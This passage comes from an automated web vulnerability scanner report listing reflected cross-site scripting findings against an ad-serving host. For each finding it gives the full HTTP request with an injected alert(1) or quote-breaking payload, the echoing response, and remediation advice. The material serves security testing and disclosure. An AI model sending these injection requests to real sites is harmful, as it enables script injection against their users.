p://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=&503c3"><ScRiPt>alert(1)</ScRiPt>d27b9e5c3dc=1http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.186570782.191466968;ct.1/01&clickTag=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENS
...[SNIP]...

2.726. http://redcated/D21/iview/170469798/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/170469798/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e10fb'-alert(1)-'b2d8c8c7741 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/170469798/direct;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=&e10fb'-alert(1)-'b2d8c8c7741=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://en.info.sympatico.ca/directory/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7617
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:05:35 GMT

<html><head><title>LG_HA_Contest_Banners_300x250_promo_EN_001</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-
...[SNIP]...
p://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=&e10fb'-alert(1)-'b2d8c8c7741=1');
}
else
{
_strContentLGP1288021585433 = '<a target="_blank" href="http://clk.atdmt.com/go/170469798/direct;wi.300;hi.250;ai.186838354.187631361;ct.1/01/" onclick="if(\'http://bellcan.adbure
...[SNIP]...

2.727. http://redcated/D21/iview/170469798/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/170469798/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2447b"-alert(1)-"fbee99d0a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/170469798/direct;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=&2447b"-alert(1)-"fbee99d0a0=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://en.info.sympatico.ca/directory/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 2405
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:05:27 GMT

<SCRIPT Language="Javascript">
var MPcode = "11918-115416-6552-1";
var MPwidth = "300";
var MPheight = "250";
var randNum = Math.floor(Math.random() * 10000000);
var iframesrc = "http://altfarm.m
...[SNIP]...
p://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=&2447b"-alert(1)-"fbee99d0a0=1http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href= width=" + MPwidth + " height=" + MPheight + " marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0
...[SNIP]...

2.728. http://redcated/D21/iview/170469798/direct [wi.300;hi.250/01/5979345757?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/170469798/direct

Issue detail

The value of the wi.300;hi.250/01/5979345757?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9c2b</script><script>alert(1)</script>a0e8e9b36b6 was submitted in the wi.300;hi.250/01/5979345757?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/170469798/direct;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=f9c2b</script><script>alert(1)</script>a0e8e9b36b6 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://en.info.sympatico.ca/directory/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 2485
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:05:09 GMT

<SCRIPT Language="Javascript">
var MPcode = "11918-115416-6552-1";
var MPwidth = "300";
var MPheight = "250";
var randNum = Math.floor(Math.random() * 10000000);
var iframesrc = "http://altfarm.m
...[SNIP]...
tp://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=f9c2b</script><script>alert(1)</script>a0e8e9b36b6http://clk.redcated/go/170469798/direct;wi.300;hi.250;ai.190346160.190567890;ct.1/01?href= width=" + MPwidth + " height=" + MPheight + " marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 sc
...[SNIP]...

2.729. http://redcated/DEN/iview/249686683/direct/01/207115393 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /DEN/iview/249686683/direct/01/207115393

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66ff6'%3ba20c5d6b7eb was submitted in the REST URL parameter 4. This input was echoed as 66ff6';a20c5d6b7eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/249686683/direct66ff6'%3ba20c5d6b7eb/01/207115393 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6850
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:09 GMT
Connection: close

<html><head><title>believe_300x250_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/DEDENMACYMCM/Macys_Believe_10/believe_300x250.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/249686683/direct66ff6';a20c5d6b7eb;ai.189689153;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/249686683/direct66ff6';a20c5d6b7eb;ai.189689153;ct.1/01" />
...[SNIP]...

2.730. http://redcated/DEN/iview/249686683/direct/01/207115393 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/iview/249686683/direct/01/207115393

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9829a'-alert(1)-'2a1d58c8460 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/249686683/direct/01/207115393?click=http://at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=9829a'-alert(1)-'2a1d58c8460 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/_uac/adpage.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7863
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:26:43 GMT

<html><head><title>believe_300x250_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
/at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=9829a'-alert(1)-'2a1d58c8460');
}
else
{
_strContentMCM1288979485696 = '<a target="_blank" href="http://clk.atdmt.com/go/249686683/direct;ai.189689153;ct.1/01/" onclick="if(\'http://at.atwola.com/adlink/5113/796973/0/170/A
...[SNIP]...

2.731. http://redcated/DEN/iview/249686683/direct/01/207115393 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/iview/249686683/direct/01/207115393

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58357</script><script>alert(1)</script>af26c545d1f was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/249686683/direct/01/207115393?click=http://at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=58357</script><script>alert(1)</script>af26c545d1f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/_uac/adpage.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7975
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:26:43 GMT

<html><head><title>believe_300x250_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
/at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=58357</script><script>alert(1)</script>af26c545d1f",
clickThruUrl: "http://clk.redcated/go/249686683/direct;ai.189689153;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

2.732. http://redcated/DEN/iview/249686683/direct/01/207115393 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/iview/249686683/direct/01/207115393

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dc3"><script>alert(1)</script>4375e59c511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DEN/iview/249686683/direct/01/207115393?click=http://at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=&52dc3"><script>alert(1)</script>4375e59c511=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/_uac/adpage.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7957
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:26:57 GMT

<html><head><title>believe_300x250_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=&52dc3"><script>alert(1)</script>4375e59c511=1\')(new Image).src=\'http://at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:5
...[SNIP]...

2.733. http://redcated/DEN/iview/249686683/direct/01/207115393 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/iview/249686683/direct/01/207115393

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1167"-alert(1)-"ae2b2a21c7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/249686683/direct/01/207115393?click=http://at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=&a1167"-alert(1)-"ae2b2a21c7d=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/_uac/adpage.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7880
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:26:58 GMT

<html><head><title>believe_300x250_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
at.atwola.com/adlink/5113/796973/0/170/AdId=1144509;BnId=1;itime=207115393;kvpg=gnn%2F;kvmn=93301162;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=&a1167"-alert(1)-"ae2b2a21c7d=1",
clickThruUrl: "http://clk.redcated/go/249686683/direct;ai.189689153;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

2.734. http://redcated/DEN/iview/249686747/direct/01/207115013 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /DEN/iview/249686747/direct/01/207115013

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81e92'%3b534b714456c was submitted in the REST URL parameter 4. This input was echoed as 81e92';534b714456c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/249686747/direct81e92'%3b534b714456c/01/207115013 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6845
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:10 GMT
Connection: close

<html><head><title>believe_728x90_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" b
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/DEDENMACYMCM/Macys_Believe_10/believe_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/249686747/direct81e92';534b714456c;ai.189689154;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/249686747/direct81e92';534b714456c;ai.189689154;ct.1/01" />
...[SNIP]...

2.735. http://redcated/DEN/iview/249686747/direct/01/207115013 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/iview/249686747/direct/01/207115013

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f7a3</script><script>alert(1)</script>5efd071bad4 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/249686747/direct/01/207115013?click=http://at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=6f7a3</script><script>alert(1)</script>5efd071bad4 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/_uac/adpage.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7968
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:26:42 GMT

<html><head><title>believe_728x90_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" b
...[SNIP]...
/at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=6f7a3</script><script>alert(1)</script>5efd071bad4",
clickThruUrl: "http://clk.redcated/go/249686747/direct;ai.189689154;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

2.736. http://redcated/DEN/iview/249686747/direct/01/207115013 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/iview/249686747/direct/01/207115013

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccb08'-alert(1)-'8a4fabd9f78 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/249686747/direct/01/207115013?click=http://at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=ccb08'-alert(1)-'8a4fabd9f78 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/_uac/adpage.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7854
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:26:43 GMT

<html><head><title>believe_728x90_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" b
...[SNIP]...
/at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=ccb08'-alert(1)-'8a4fabd9f78');
}
else
{
_strContentMCM1288979618215 = '<a target="_blank" href="http://clk.atdmt.com/go/249686747/direct;ai.189689154;ct.1/01/" onclick="if(\'http://at.atwola.com/adlink/5113/796952/0/225/A
...[SNIP]...

2.737. http://redcated/DEN/iview/249686747/direct/01/207115013 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/iview/249686747/direct/01/207115013

Issue detail

